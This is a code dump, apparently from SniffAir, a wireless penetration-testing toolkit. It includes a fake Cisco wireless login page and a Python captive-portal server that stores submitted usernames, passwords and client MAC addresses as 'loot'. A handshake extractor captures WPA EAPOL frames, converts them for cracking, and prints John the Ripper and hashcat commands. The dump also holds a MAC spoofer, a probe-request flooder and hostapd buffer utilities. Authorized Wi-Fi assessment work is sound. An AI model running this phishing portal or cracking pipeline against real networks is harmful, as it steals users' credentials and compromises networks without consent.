#endif /* TRACE_H */ 69 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/uuid.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Universally Unique IDentifier (UUID) 3 | * Copyright (c) 2008, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #include "includes.h" 10 | 11 | #include "common.h" 12 | #include "uuid.h" 13 | 14 | int uuid_str2bin(const char *str, u8 *bin) 15 | { 16 | const char *pos; 17 | u8 *opos; 18 | 19 | pos = str; 20 | opos = bin; 21 | 22 | if (hexstr2bin(pos, opos, 4)) 23 | return -1; 24 | pos += 8; 25 | opos += 4; 26 | 27 | if (*pos++ != '-' || hexstr2bin(pos, opos, 2)) 28 | return -1; 29 | pos += 4; 30 | opos += 2; 31 | 32 | if (*pos++ != '-' || hexstr2bin(pos, opos, 2)) 33 | return -1; 34 | pos += 4; 35 | opos += 2; 36 | 37 | if (*pos++ != '-' || hexstr2bin(pos, opos, 2)) 38 | return -1; 39 | pos += 4; 40 | opos += 2; 41 | 42 | if (*pos++ != '-' || hexstr2bin(pos, opos, 6)) 43 | return -1; 44 | 45 | return 0; 46 | } 47 | 48 | 49 | int uuid_bin2str(const u8 *bin, char *str, size_t max_len) 50 | { 51 | int len; 52 | len = os_snprintf(str, max_len, "%02x%02x%02x%02x-%02x%02x-%02x%02x-" 53 | "%02x%02x-%02x%02x%02x%02x%02x%02x", 54 | bin[0], bin[1], bin[2], bin[3], 55 | bin[4], bin[5], bin[6], bin[7], 56 | bin[8], bin[9], bin[10], bin[11], 57 | bin[12], bin[13], bin[14], bin[15]); 58 | if (len < 0 || (size_t) len >= max_len) 59 | return -1; 60 | return 0; 61 | } 62 | 63 | 64 | int is_nil_uuid(const u8 *uuid) 65 | { 66 | int i; 67 | for (i = 0; i < UUID_LEN; i++) 68 | if (uuid[i]) 69 | return 0; 70 | return 1; 71 | } 72 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/uuid.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Universally Unique IDentifier (UUID) 3 | * Copyright (c) 2008, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef UUID_H 10 | #define UUID_H 11 | 12 | #define UUID_LEN 16 13 | 14 | int uuid_str2bin(const char *str, u8 *bin); 15 | int uuid_bin2str(const u8 *bin, char *str, size_t max_len); 16 | int is_nil_uuid(const u8 *uuid); 17 | 18 | #endif /* UUID_H */ 19 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/wpabuf.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Dynamic data buffer 3 | * Copyright (c) 2007-2012, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef WPABUF_H 10 | #define WPABUF_H 11 | 12 | /* wpabuf::buf is a pointer to external data */ 13 | #define WPABUF_FLAG_EXT_DATA BIT(0) 14 | 15 | /* 16 | * Internal data structure for wpabuf. Please do not touch this directly from 17 | * elsewhere. This is only defined in header file to allow inline functions 18 | * from this file to access data. 19 | */ 20 | struct wpabuf { 21 | size_t size; /* total size of the allocated buffer */ 22 | size_t used; /* length of data in the buffer */ 23 | u8 *buf; /* pointer to the head of the buffer */ 24 | unsigned int flags; 25 | /* optionally followed by the allocated buffer */ 26 | }; 27 | 28 | 29 | int wpabuf_resize(struct wpabuf **buf, size_t add_len); 30 | struct wpabuf * wpabuf_alloc(size_t len); 31 | struct wpabuf * wpabuf_alloc_ext_data(u8 *data, size_t len); 32 | struct wpabuf * wpabuf_alloc_copy(const void *data, size_t len); 33 | struct wpabuf * wpabuf_dup(const struct wpabuf *src); 34 | void wpabuf_free(struct wpabuf *buf); 35 | void * wpabuf_put(struct wpabuf *buf, size_t len); 36 | struct wpabuf * wpabuf_concat(struct wpabuf *a, struct wpabuf *b); 37 | struct wpabuf * wpabuf_zeropad(struct wpabuf *buf, size_t len); 38 | void wpabuf_printf(struct wpabuf *buf, char *fmt, ...) PRINTF_FORMAT(2, 3); 39 | 40 | 41 | /** 42 | * wpabuf_size - Get the currently allocated size of a wpabuf buffer 43 | * @buf: wpabuf buffer 44 | * Returns: Currently allocated size of the buffer 45 | */ 46 | static inline size_t wpabuf_size(const struct wpabuf *buf) 47 | { 48 | return buf->size; 49 | } 50 | 51 | /** 52 | * wpabuf_len - Get the current length of a wpabuf buffer data 53 | * @buf: wpabuf buffer 54 | * Returns: Currently used length of the buffer 55 | */ 56 | static inline size_t wpabuf_len(const struct wpabuf *buf) 57 | { 58 | return buf->used; 59 | } 60 | 61 | /** 62 | * wpabuf_tailroom - Get size of available tail room in the end of the buffer 63 | * @buf: wpabuf buffer 64 | * Returns: Tail room (in bytes) of available space in the end of the buffer 65 | */ 66 | static inline size_t wpabuf_tailroom(const struct wpabuf *buf) 67 | { 68 | return buf->size - buf->used; 69 | } 70 | 71 | /** 72 | * wpabuf_head - Get pointer to the head of the buffer data 73 | * @buf: wpabuf buffer 74 | * Returns: Pointer to the head of the buffer data 75 | */ 76 | static inline const void * wpabuf_head(const struct wpabuf *buf) 77 | { 78 | return buf->buf; 79 | } 80 | 81 | static inline const u8 * wpabuf_head_u8(const struct wpabuf *buf) 82 | { 83 | return wpabuf_head(buf); 84 | } 85 | 86 | /** 87 | * wpabuf_mhead - Get modifiable pointer to the head of the buffer data 88 | * @buf: wpabuf buffer 89 | * Returns: Pointer to the head of the buffer data 90 | */ 91 | static inline void * wpabuf_mhead(struct wpabuf *buf) 92 | { 93 | return buf->buf; 94 | } 95 | 96 | static inline u8 * wpabuf_mhead_u8(struct wpabuf *buf) 97 | { 98 | return wpabuf_mhead(buf); 99 | } 100 | 101 | static inline void wpabuf_put_u8(struct wpabuf *buf, u8 data) 102 | { 103 | u8 *pos = wpabuf_put(buf, 1); 104 | *pos = data; 105 | } 106 | 107 | static inline void wpabuf_put_le16(struct wpabuf *buf, u16 data) 108 | { 109 | u8 *pos = wpabuf_put(buf, 2); 110 | WPA_PUT_LE16(pos, data); 111 | } 112 | 113 | static inline void wpabuf_put_le32(struct wpabuf *buf, u32 data) 114 | { 115 | u8 *pos = wpabuf_put(buf, 4); 116 | WPA_PUT_LE32(pos, data); 117 | } 118 | 119 | static inline void wpabuf_put_be16(struct wpabuf *buf, u16 data) 120 | { 121 | u8 *pos = wpabuf_put(buf, 2); 122 | WPA_PUT_BE16(pos, data); 123 | } 124 | 125 | static inline void wpabuf_put_be24(struct wpabuf *buf, u32 data) 126 | { 127 | u8 *pos = wpabuf_put(buf, 3); 128 | WPA_PUT_BE24(pos, data); 129 | } 130 | 131 | static inline void wpabuf_put_be32(struct wpabuf *buf, u32 data) 132 | { 133 | u8 *pos = wpabuf_put(buf, 4); 134 | WPA_PUT_BE32(pos, data); 135 | } 136 | 137 | static inline void wpabuf_put_data(struct wpabuf *buf, const void *data, 138 | size_t len) 139 | { 140 | if (data) 141 | os_memcpy(wpabuf_put(buf, len), data, len); 142 | } 143 | 144 | static inline void wpabuf_put_buf(struct wpabuf *dst, 145 | const struct wpabuf *src) 146 | { 147 | wpabuf_put_data(dst, wpabuf_head(src), wpabuf_len(src)); 148 | } 149 | 150 | static inline void wpabuf_set(struct wpabuf *buf, const void *data, size_t len) 151 | { 152 | buf->buf = (u8 *) data; 153 | buf->flags = WPABUF_FLAG_EXT_DATA; 154 | buf->size = buf->used = len; 155 | } 156 | 157 | static inline void wpabuf_put_str(struct wpabuf *dst, const char *str) 158 | { 159 | wpabuf_put_data(dst, str, os_strlen(str)); 160 | } 161 | 162 | #endif /* WPABUF_H */ 163 | -------------------------------------------------------------------------------- /module/Captive_Portal/cisco/images/background.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/Captive_Portal/cisco/images/background.jpg -------------------------------------------------------------------------------- /module/Captive_Portal/cisco/images/cisco.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/Captive_Portal/cisco/images/cisco.gif -------------------------------------------------------------------------------- /module/Captive_Portal/cisco/images/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/Captive_Portal/cisco/images/favicon.ico -------------------------------------------------------------------------------- /module/Captive_Portal/cisco/index.html: -------------------------------------------------------------------------------- 1 | 2 | Web Authentication 3 | 4 | 5 | 6 | 7 | 51 | 52 | 53 |
54 | 55 | 56 | 57 | 58 | 59 | 60 |
61 | 62 | 63 | 67 | 68 | 70 | 71 | 72 | 73 | 124 | 132 | 133 |
64 | 65 |

Login

66 | 		69 |
74 |
75 | 76 | 77 | 93 | 94 | 95 | 96 | 119 | 120 | 121 |
78 | 79 | 80 | 83 | 84 | 85 | 90 | 91 |
81 | Welcome to the Cisco wireless network 82 |
86 | Cisco is pleased to provide the Wireless 87 | LAN infrastructure for your network. Please login and put your air 88 | space to work. 89 |
92 |
97 | 98 | 99 | 100 | 103 | 104 | 105 | 106 | 109 | 110 | 111 | 112 | 116 | 117 |
User Name 101 | 102 |
Password 107 | 108 |
  113 | 114 | 115 |
118 |
122 |
123 | 		125 | 126 | 127 | 129 | 130 |
128 |
131 |
134 |
135 |
136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | -------------------------------------------------------------------------------- /module/Captive_Portal/cisco/login.html: -------------------------------------------------------------------------------- 1 | 2 | Web Authentication 3 | 4 | 5 | 6 | 7 | 51 | 52 | 53 |
54 | 55 | 56 | 57 | 58 | 59 | 60 |
61 | 62 | 63 | 67 | 68 | 70 | 71 | 72 | 73 | 124 | 132 | 133 |
64 | 65 |

Login

66 | 		69 |
74 |
75 | 76 | 77 | 93 | 94 | 95 | 96 | 119 | 120 | 121 |
78 | 79 | 80 | 83 | 84 | 85 | 90 | 91 |
81 | Welcome to the Cisco wireless network 82 |
86 | Cisco is pleased to provide the Wireless 87 | LAN infrastructure for your network. Please login and put your air 88 | space to work. 89 |
92 |
97 | 98 | 99 | 100 | 103 | 104 | 105 | 106 | 109 | 110 | 111 | 112 | 116 | 117 |
User Name 101 | 102 |
Password 107 | 108 |
  113 | 114 | 115 |
118 |
122 |
123 | 		125 | 126 | 127 | 129 | 130 |
128 |
131 |
134 |
135 |
136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | -------------------------------------------------------------------------------- /module/Captive_Portal/cisco/static/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/Captive_Portal/cisco/static/favicon.ico -------------------------------------------------------------------------------- /module/Captive_Portal/dns.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/Captive_Portal/dns.log -------------------------------------------------------------------------------- /module/Captive_Portal/dnsmasq.conf: -------------------------------------------------------------------------------- 1 | interface=wlan0 2 | dhcp-range=wlan0,10.20.0.2,10.20.0.254,12h 3 | log-facility = module/Captive_Portal/dns.log 4 | log-dhcp 5 | -------------------------------------------------------------------------------- /module/Captive_Portal/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import subprocess 3 | import sys, time 4 | sys.path.insert(0, '../../../lib/') 5 | from Queries import * 6 | import BaseHTTPServer 7 | import cgi 8 | import os 9 | from os import curdir, sep 10 | from mimetypes import types_map 11 | 12 | workspace = "../../../"+sys.argv[1] 13 | PORT = 80 14 | 15 | class CaptivePortal(BaseHTTPServer.BaseHTTPRequestHandler): 16 | 17 | 18 | 19 | def do_GET(self): 20 | orginal = self.path 21 | try: 22 | sendReply = False 23 | if '?' in self.path: 24 | self.path = "login.html" 25 | mimetype='text/html' 26 | sendReply = True 27 | if self.path == "/login": 28 | self.path = "login.html" 29 | mimetype='text/html' 30 | sendReply = True 31 | if self.path == "/": 32 | self.path = "login.html" 33 | mimetype='text/html' 34 | sendReply = True 35 | if self.path == "favico.ico": 36 | self.path = "login.html" 37 | mimetype='text/html' 38 | sendReply = True 39 | if self.path.endswith(".jpg"): 40 | mimetype='image/jpg' 41 | sendReply = True 42 | if self.path.endswith(".png"): 43 | mimetype='image/png' 44 | sendReply = True 45 | if self.path.endswith(".gif"): 46 | mimetype='image/gif' 47 | sendReply = True 48 | if self.path.endswith(".css"): 49 | mimetype='text/css' 50 | sendReply = True 51 | if self.path.endswith(".js"): 52 | mimetype='application/javascript' 53 | sendReply = True 54 | if sendReply == True: 55 | f = open(curdir + sep + self.path, 'rb') 56 | self.send_response(200) 57 | self.send_header('Content-type',mimetype) 58 | self.end_headers() 59 | self.wfile.write(f.read()) 60 | f.close() 61 | print(curdir + sep + self.path) 62 | else: 63 | self.path = "login.html" 64 | mimetype='text/html' 65 | f = open(curdir + sep + self.path, 'rb') 66 | self.send_response(200) 67 | self.send_header('Content-type',mimetype) 68 | self.end_headers() 69 | self.wfile.write(f.read()) 70 | f.close() 71 | print(curdir + sep + self.path) 72 | return 73 | except IOError: 74 | self.send_error(404) 75 | 76 | 77 | def do_POST(self): 78 | form = cgi.FieldStorage( 79 | fp=self.rfile, 80 | headers=self.headers, 81 | environ={'REQUEST_METHOD':'POST', 82 | 'CONTENT_TYPE':self.headers['Content-Type'], 83 | }) 84 | 85 | username = form.getvalue("username") 86 | password = form.getvalue("password") 87 | remote_IP = self.client_address[0] 88 | IP_MAC = subprocess.check_output('grep -o -P \'.{0,0}'+remote_IP+'.{0,18}\' ..//dns.log | uniq', shell=True).split(' ') 89 | loot = {'MAC': '','Username': '','Password': ''} 90 | loot.update(Username = username) 91 | loot.update(MAC = IP_MAC[1].replace("\n","")) 92 | loot.update(Password = password) 93 | d = queries() 94 | d.db_connect(workspace) 95 | d.loot(loot) 96 | print "################################################################################################################" 97 | print 'MAC ADDRESS: '+str(IP_MAC[1]).replace("\n","")+', USERNAME: '+ str(username).replace('\n','').replace('\'','')+', PASSWORD: '+ str(password) 98 | print "################################################################################################################" 99 | subprocess.call(["iptables","-t", "nat", "-I", "PREROUTING","1", "-s", remote_IP, "-j" ,"ACCEPT"]) 100 | subprocess.call(["iptables", "-I", "FORWARD", "-s", remote_IP, "-j" ,"ACCEPT"]) 101 | self.send_response(200) 102 | self.send_header("Content-type", "text/html") 103 | self.end_headers() 104 | time.sleep(5) 105 | subprocess.call(["iptables", "-D", "FORWARD", "-s", remote_IP, "-j" ,"ACCEPT"]) 106 | 107 | 108 | httpd = BaseHTTPServer.HTTPServer(('', PORT), CaptivePortal) 109 | 110 | try: 111 | httpd.serve_forever() 112 | except KeyboardInterrupt: 113 | pass 114 | httpd.server_close() 115 | 116 | 117 | -------------------------------------------------------------------------------- /module/Discover_Hidden_SSID.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import sqlite3 3 | import pandas as dp 4 | import pandas 5 | sys.path.insert(0, '../lib/') 6 | import Queries 7 | from Queries import * 8 | 9 | def main(workspace): 10 | ws = workspace 11 | q = queries() 12 | ws1 = q.db_connect(ws) 13 | try: 14 | AP = dp.read_sql('select BSSID from accessPoints where ESSID = "Hidden"', ws1) 15 | AP_BSSID = AP.to_string(index=False, header=False) 16 | AP_BSSID = AP_BSSID.split('\n') 17 | for v in AP_BSSID: 18 | PR_ESSID = dp.read_sql('select ESSID from ProbeResponses where BSSID="'+v+'"', ws1).drop_duplicates() 19 | PR_BSSID = dp.read_sql('select BSSID from ProbeResponses where BSSID="'+v+'"', ws1).drop_duplicates() 20 | HST = dp.concat([PR_ESSID, PR_BSSID], axis=1, join='inner') 21 | HST.to_sql("Hidden_SSID", ws1 , if_exists="append") 22 | rawr = dp.read_sql('select * from accessPoints', ws1) 23 | if PR_ESSID.empty: 24 | continue 25 | else: 26 | ESSID = PR_ESSID.to_string(index=False, header=False) 27 | ESSID = ESSID.split('\n') 28 | rawr.loc[rawr['BSSID'] == v, 'ESSID'] = ESSID 29 | del rawr['ID'] 30 | rawr.reset_index(inplace=True) 31 | rawr.index.name="ID" 32 | rawr.index = rawr.index + 1 33 | del rawr['index'] 34 | rawr.to_sql("accessPoints", ws1 , if_exists="replace") 35 | value_pr = PR_ESSID.to_string(index=False, header=False) 36 | print "DISCOVERED HIDDEN SSID. "+v+ " is actually: " +str(value_pr) 37 | 38 | HS = dp.read_sql('select * from Hidden_SSID', ws1) 39 | if HS.empty: 40 | print "NO SSIDS DISCOVERED" 41 | else: 42 | del HS['index'] 43 | HS.reset_index(inplace=True) 44 | HS.index.name="ID" 45 | HS.index = HS.index + 1 46 | del HS['index'] 47 | HS.to_sql("Hidden_SSID", ws1 , if_exists="replace") 48 | print "Completed" 49 | except KeyError: 50 | print "NO NEW SSIDS DISCOVERED." 51 | HS_exist = dp.read_sql('SELECT name FROM sqlite_master WHERE name="Hidden_SSID"', ws1) 52 | if HS_exist.empty: 53 | pass 54 | else: 55 | HS = dp.read_sql('select * from Hidden_SSID', ws1) 56 | print tabulate ( HS, showindex=False, headers=HS.columns, tablefmt="psql" ) 57 | 58 | -------------------------------------------------------------------------------- /module/Handshaker/Handshaker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import logging 3 | 4 | logging.getLogger ( "scapy.runtime" ).setLevel ( logging.CRITICAL ) 5 | from scapy.all import * 6 | 7 | load_contrib ( 'ppi_cace' ) 8 | import sys, os, time, signal, subprocess 9 | import argparse 10 | 11 | sys.path.insert ( 0, '../../lib/' ) 12 | from Queries import * 13 | 14 | parser = argparse.ArgumentParser () 15 | parser.add_argument ( '-f', '--format', metavar='format', dest='format', action='store', help='Format JTR or Hashcat\n',required=True ) 16 | parser.add_argument ( '-s', '--ssid', metavar='SSID', dest='ssid', action='store', help=argparse.SUPPRESS, required=False ) 17 | parser.add_argument ( '-p', '--path', metavar='path', dest='path', action='store', help='path\n', required=False ) 18 | parser.add_argument ( '-w', '--workspace', metavar='database', dest='database', action='store', help='workspace name\n', required=True ) 19 | parser.add_argument ( '-i', '--inputfile', metavar='inputfile', dest='inputfile', action='store', help='input file path\n', required=False ) 20 | 21 | args = parser.parse_args () 22 | 23 | workspace = args.database 24 | q = queries () 25 | ws = q.db_connect ( '../../' + workspace ) 26 | 27 | 28 | def test(pkts): 29 | global outpath 30 | if args.path: 31 | outpath = args.path 32 | else: 33 | outpath = path 34 | 35 | if args.ssid: 36 | SSID_List = args.ssid 37 | MAC_List = str ( q.show_MACs (SSID_List) ) 38 | MAC_List = MAC_List.split ( '\n' ) 39 | else: 40 | sql = dp.read_sql ( 'select * from INSCOPE_SSIDS', ws ) 41 | if sql.empty: 42 | print "No inscope SSIDSs found, please add a SSID before running this module again.\n" 43 | return 44 | else: 45 | SSID_List = str ( q.show_inscope_ssids () ) 46 | SSID_List = SSID_List.split ( '\n' ) 47 | 48 | MAC_List = str ( q.show_inscope_MACs () ) 49 | MAC_List = MAC_List.split( '\n' ) 50 | 51 | for pkt in pkts: 52 | if Dot11Beacon in pkt: 53 | if str ( pkt[Dot11Elt:1].info ) == "": 54 | SSID = "Hidden" 55 | elif str ( pkt[Dot11Elt:1].info ).startswith ( "\000" ): 56 | SSID = "Hidden" 57 | else: 58 | SSID = pkt[Dot11Elt:1].info 59 | SSID = SSID.decode ( 'utf-8', 'ignore' ) 60 | if SSID in SSID_List: 61 | wrpcap (outpath +'/filtered.pcap', pkt, append=True ) 62 | 63 | if pkt.haslayer ( EAPOL ): 64 | EAPOLP = pkt[EAPOL] 65 | if EAPOLP.type == 3: 66 | if pkt.addr2 in MAC_List: 67 | if str ( EAPOLP )[6:8].encode ( "hex" ) == "8a00": 68 | wrpcap ( outpath + '/filtered.pcap', pkt, append=True ) 69 | ascii_ap_mac = pkt.addr2 70 | ascii_client_mac = pkt.addr1 71 | aNonce = str ( EAPOLP )[17:49].encode ( "hex" ) 72 | print "Frame 1" 73 | print "AP MAC: " + ascii_ap_mac 74 | print "Client MAC: " + ascii_client_mac 75 | print "ANonce: " + aNonce 76 | 77 | elif str ( EAPOLP )[6:8].encode ( "hex" ) == "0a00" and str ( EAPOLP )[99:123].encode ( "hex" ): 78 | if pkt.addr2 in MAC_List: 79 | wrpcap ( outpath + '/filtered.pcap', pkt, append=True ) 80 | ascii_ap_mac = pkt.addr2 81 | ascii_client_mac = pkt.addr1 82 | sNonce = str ( EAPOLP )[17:49].encode ( "hex" ) 83 | mic = str ( EAPOLP )[81:97].encode ( "hex" ) 84 | data = str ( EAPOLP )[99:123].encode ( "hex" ) 85 | print "Frame 2" 86 | print "AP MAC: " + ascii_ap_mac 87 | print "Client MAC: " + ascii_client_mac 88 | print "SNonce: " + sNonce 89 | print "MIC: " + mic 90 | print "Data: " + data 91 | else: 92 | return 93 | if args.inputfile == "None": 94 | pullpath = args.inputfile 95 | sniff(offline=fullpath, count=0, store=0, prn=test) 96 | else: 97 | path = workspace.split("/") 98 | path = '/'.join(path[0:2]) 99 | path = "../../"+path 100 | for file in os.listdir (path): 101 | if file.endswith ( ".pcapdump" ): 102 | fullpath = (os.path.join ( path, file )) 103 | print fullpath 104 | sniff ( offline=fullpath, count=0, store=0, prn=test ) 105 | 106 | 107 | if args.format == "JTR": 108 | subprocess.call ( 'aircrack-ng -J' + outpath + '/filtered.pcap > ' +outpath + '/test1.hccap', shell=True ) 109 | subprocess.call ( 'hccap2john '+ outpath +'/test1.hccap > '+ outpath +'/hccap.john', shell=True ) 110 | print "john -wordlist= -format=wpapsk \"hccap.john\"" 111 | 112 | if args.format == "Hashcat": 113 | subprocess.call ( './cap2hccapx.bin filtered.pcap output.hccapx >/dev/null 2>&1', shell=True ) 114 | print "oclHashcat64.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d" 115 | print " or" 116 | print "oclHashcat64.exe -m 2500 -a0 capture.hccapx" 117 | 118 | if args.format == "both": 119 | subprocess.call ( './cap2hccapx.bin '+ outpath +'/filtered.pcap '+ outpath +'/output.hccapx >/dev/null 2>&1', shell=True ) 120 | subprocess.call ( 'aircrack-ng -J '+ outpath +'/filtered.pcap '+ outpath +'/test1.hccap', shell=True ) 121 | subprocess.call ( 'hccap2john '+ outpath +'/test1.hccap > '+ outpath +'/hccap.john', shell=True ) 122 | print "john -wordlist= -format=wpapsk \"hccap.john\"" 123 | print "oclHashcat64.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d" 124 | print " or" 125 | print "oclHashcat64.exe -m 2500 -a0 capture.hccapx" 126 | 127 | subprocess.call ( 'rm -rf '+ outpath +'/filtered.pcap', shell=True ) 128 | subprocess.call ( 'rm -rf '+ outpath +'/test1.hccap', shell=True ) 129 | -------------------------------------------------------------------------------- /module/Handshaker/cap2hccapx.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/Handshaker/cap2hccapx.bin -------------------------------------------------------------------------------- /module/MAC_Changer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, os, subprocess, argparse, time 4 | parser = argparse.ArgumentParser () 5 | parser.add_argument ( '-I', '--Interface', metavar='iface', dest='iface', action='store', help= argparse.SUPPRESS, required=True ) 6 | parser.add_argument ( '-M', '--MAC', metavar='MAC', dest='MAC', action='store', help=argparse.SUPPRESS, required=False ) 7 | args = parser.parse_args () 8 | 9 | def MAC_Changer(): 10 | subprocess.call ( 'ifconfig ' + args.iface +' down', shell=True ) 11 | subprocess.call ( 'sudo macchanger --mac ' + args.MAC +' '+ args.iface, shell=True ) 12 | subprocess.call ( 'ifconfig ' + args.iface + ' up', shell=True ) 13 | #print "Interface " + args.iface + " new MAC Address:" + args.MAC 14 | 15 | MAC_Changer() -------------------------------------------------------------------------------- /module/Probe_Packet.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys 4 | import signal 5 | import argparse 6 | import logging 7 | logging.getLogger ( "scapy.runtime" ).setLevel ( logging.CRITICAL ) 8 | from scapy.all import * 9 | 10 | # Setup signal handler to catch CTRL-C 11 | def signal_handler(signal, frame): 12 | sys.exit(0) 13 | signal.signal(signal.SIGINT, signal_handler) 14 | 15 | # Get arguments 16 | parser = argparse.ArgumentParser() 17 | parser.add_argument('-i', '--interface', metavar='interface', help='wireless interface to use', required=True) 18 | parser.add_argument('-d', '--delay', metavar='delay', help='seconds to delay (default=.3)', default=.3, type=float) 19 | parser.add_argument('-c', '--count', metavar='count', \ 20 | help='number of packets to send per SSID per iteration (default=10)', default=10, type=int) 21 | parser.add_argument('-m', '--mac', metavar='mac', help='last 3 octets of source mac address (default=00:11:22)', default='00:11:22') 22 | ssid_group = parser.add_mutually_exclusive_group(required=True) 23 | ssid_group.add_argument('-s', '--ssid', metavar='ssid', help='ssid name') 24 | ssid_group.add_argument('-f', '--file', metavar='file', help='ssid file') 25 | args = parser.parse_args() 26 | 27 | # Create ssid list 28 | ssids = [] 29 | if args.file == None: 30 | ssids.extend([args.ssid]) 31 | else: 32 | with open(args.file) as f: 33 | content = f.readlines() 34 | ssids = [x.strip() for x in content] 35 | 36 | # Setup probe request packet 37 | param = Dot11ProbeReq() 38 | ratestr = '03\x12\x96\x18\x24\x30\x48\x60' 39 | rates = Dot11Elt(ID='Rates',info=ratestr) 40 | dst = 'ff:ff:ff:ff:ff:ff' 41 | 42 | # Loop until CTRL-C 43 | while True: 44 | for ssid in ssids: 45 | essid = Dot11Elt(ID='SSID',info=ssid) 46 | #dsset = Dot11Elt(ID='DSset',info='\x01') 47 | pkt = RadioTap()\ 48 | /Dot11(type=0,subtype=4,addr1=dst,addr2=RandMAC()[0:9]+args.mac,addr3=dst)\ 49 | /param/essid/rates 50 | 51 | print '[*] 802.11 Probe Request: SSID=[%s], count=%d' % (ssid,args.count) 52 | try: 53 | sendp(pkt,count=args.count,inter=args.delay,verbose=0,iface=args.interface) 54 | except: 55 | raise -------------------------------------------------------------------------------- /module/SSID_stat.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sqlite3 3 | import pandas as dp 4 | import pandas 5 | import Queries 6 | from Queries import * 7 | from prettytable import PrettyTable 8 | 9 | 10 | def main(workspace): 11 | tables = ['accessPoints', 'ProbeResponses','EAP'] 12 | varibles = ['BSSID','VENDOR','CHAN', 'ENC, AUTH, CIPHER'] 13 | info = ['','','',''] 14 | title = ['BSSID','Vendors','Channels','Encrpytion'] 15 | ws = workspace 16 | q = queries() 17 | ws1 = q.db_connect(ws) 18 | sql = dp.read_sql('select * from INSCOPE_SSIDS', ws1) 19 | if sql.empty: 20 | print "No inscope SSIDSs found, please add a SSID before running this module again.\n" 21 | return 22 | else: 23 | result = str(q.show_inscope_ssids()) 24 | result = result.split('\n') 25 | for SSID in result: 26 | j = 0 27 | row = [] 28 | for v in varibles: 29 | try: 30 | t2 = 'select '+ v +' from ' 31 | where = ' where ESSID = \"'+ SSID.rstrip() +'\"' 32 | result = dp.DataFrame() 33 | for tb in tables: 34 | try: 35 | qr = dp.read_sql('' + t2 +' '+ tb + where +'', ws1) 36 | result = result.append(qr) 37 | except pandas.io.sql.DatabaseError: 38 | continue 39 | 40 | result = result.drop_duplicates() 41 | if v == "BSSID": 42 | AP_Count = str(len(result)) 43 | result = result.to_string(index=False, header=False) 44 | info[j] = result 45 | row.append(info[j]) 46 | j +=1 47 | except ValueError: 48 | continue 49 | print 'SSID: '+ SSID +' - APs Discovered: ' + AP_Count 50 | x = PrettyTable(title) 51 | x.add_row(row) 52 | print x 53 | 54 | #main() 55 | -------------------------------------------------------------------------------- /module/Suspicious_AP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sqlite3 3 | import pandas as dp 4 | import pandas 5 | import Queries 6 | from Queries import * 7 | 8 | def main(workspace): 9 | varibles = ['CHAN', 'VENDOR', 'ENC'] 10 | msg = ['Channel', 'Vendor', 'Encryption'] 11 | title = ['Channel - SniffAir noticed that the following APs are sitting on channels that are outside the norm from the rest of the APs in the network.', 'Vendor - SniffAir has discovered the following APs broadcasting an inscope ESSID but is from a different vendor then the rest of the network.', 'Encryption - Whoa! SniffAir discovered an AP running with a different type of encryption then the rest of the APs in that network!'] 12 | ws = workspace 13 | q = queries() 14 | ws1 = q.db_connect(ws) 15 | inscope=dp.read_sql('select * from INSCOPE_SSIDS', ws1) 16 | result = inscope.to_string(formatters={'ESSID':'{{:<{}s}}'.format(inscope['ESSID'].str.len().max()).format}, header=False, index=False) 17 | ssidresult = str(q.show_inscope_ssids()) 18 | ssidresult = ssidresult.split('\n') 19 | j = 0 20 | for v in varibles: 21 | try: 22 | result1 = dp.DataFrame() 23 | for SSID in ssidresult: 24 | query = dp.read_sql("select * from accessPoints where ESSID = '"+ SSID +"'", ws1) 25 | RA = query[v].value_counts() 26 | RA_result = RA.reset_index(name="count").query("count <2")["index"].tolist() 27 | for r in RA_result: 28 | y = query.loc[query[v].isin([str(r)])] 29 | result1 = y.append(result1) 30 | if result1.empty: 31 | print "[*] Nothing Suspicious regarding the " + msg[j] + "information" 32 | pass 33 | else: 34 | print title[j] 35 | print (tabulate(result1,showindex=False, headers=query.columns, tablefmt="psql"))+"\n" 36 | j +=1 37 | except ValueError: 38 | continue 39 | -------------------------------------------------------------------------------- /module/export.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | #sys.path.insert(0, '../lib/') 4 | import sqlite3 5 | import pandas as dp 6 | import Queries 7 | from Queries import * 8 | 9 | class colors: 10 | GRN = '\033[92m' 11 | RD = '\033[91m' 12 | NRM = '\033[0m' 13 | 14 | 15 | def main(workspace, path, name): 16 